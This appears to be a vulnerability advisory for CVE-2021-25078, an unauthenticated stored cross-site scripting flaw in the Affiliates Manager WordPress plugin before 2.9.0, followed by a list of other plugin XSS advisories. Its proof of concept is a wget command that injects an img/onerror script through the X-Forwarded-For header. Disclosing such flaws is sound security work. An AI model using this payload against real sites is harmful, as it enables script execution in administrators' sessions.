Affiliates Manager < 2.9.0 – Unauthenticated Stored Cross-Site Scripting | CVE 2021-25078 | Plugin Vulnerabilities

Description

The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.

Proof of Concept

As unauthenticated: wget "https://example.com/?wpam_id=1" --header="X-Forwarded-For: <img src onerror=alert(/XSS/)>" -q -O-

The XSS will be triggered when an admin access http://example.com/wp-admin/admin.php?page=wpam-clicktracking

Affects Plugins

affiliates-manager

Fixed in 2.9.0

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2648196

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e

Timeline

Publicly Published

2021-12-24 (about 4 years ago)

Added

2021-12-24 (about 4 years ago)

Last Updated

2022-04-10 (about 3 years ago)

Other

Published

Title

Published

2025-02-28

Title

Page Builder by SiteOrigin < 2.31.5 - Contributor+ Stored XSS

Published

2024-10-31

Title

Advanced Control Manager for WordPress by ItalyStrap <= 2.16.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-10-24

Title

Bamazoo – Button Generator <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via dgs Shortcode

Published

2025-04-01

Title

Nemesis All-in-One <= 1.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-01-16

Title

Custom Page Extensions <= 0.6 - Reflected Cross-Site Scripting